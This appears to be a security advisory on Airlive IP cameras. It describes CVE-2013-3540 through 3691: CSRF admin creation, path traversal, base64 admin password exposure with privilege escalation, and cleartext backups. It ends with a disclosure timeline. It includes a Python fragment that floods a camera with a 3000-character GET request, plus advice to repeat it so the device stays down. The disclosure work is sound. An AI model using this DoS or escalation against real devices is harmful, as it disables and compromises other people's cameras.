The information has been provided by Eliezer Varad Lopez, Javier Repiso Sanchez and Jon s Ropero Castillo.
Cross Site Request Forgery (CSRF)
CVE-2013-3540 CSRF via GET method. Targeted attack to any administrator.These cameras use a web interface which is prone to CSRF vulnerabilities.A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. In the following example we will make a vector to create an alternative user with administration credentials.
.Relative Path Traversal
CVE-2013-3541, Transversal Path that allows you to read file system configuration.
.Sensitive Information Exposure + Privilege Escalation
CVE-2013-3686, Sensitive Exposure of sensitive data by writing the following URL
We can decode Admin password (base64).
Now we can relogin like admin user and we have made the escalation privilege
Clear Text Storage of Sensitive Information
CVE-2013-3687 You can find all the sensitive information about the device in plain text inside the backup file. You can open with any text editor and look for user's information for example, passwords, users and so on.
Denial of Service (DoS)
Use CVE-2013-3691, DoS by overbuffing path / . A request with a large number of a can take down the http service from the camera device.
You will get the next message, Conexion has been reset. After remove de adds and refresh it you will get the next message, Can't Connect. It will be down for around 2min but if we are doing the request once and again each 1min for example, the camera won t recuperate ever itself.
The following Python script could be used to test the DoS:
@ request = 'GET /' + A * 3000 + '.html HTTP/1.0\r\n'
@ s = socket.socket()
@ s.connect((cam_ip, 80))
@ response = s.recv(1024)
-2013-05-31: Students team notifies the Airlive Customer Support of the vulnerabilities. No reply received.
-2013-06-03: Students asks for a reply.
-2013-06-05: Airlive team reports to the technical support to analyze the vulnerabilities.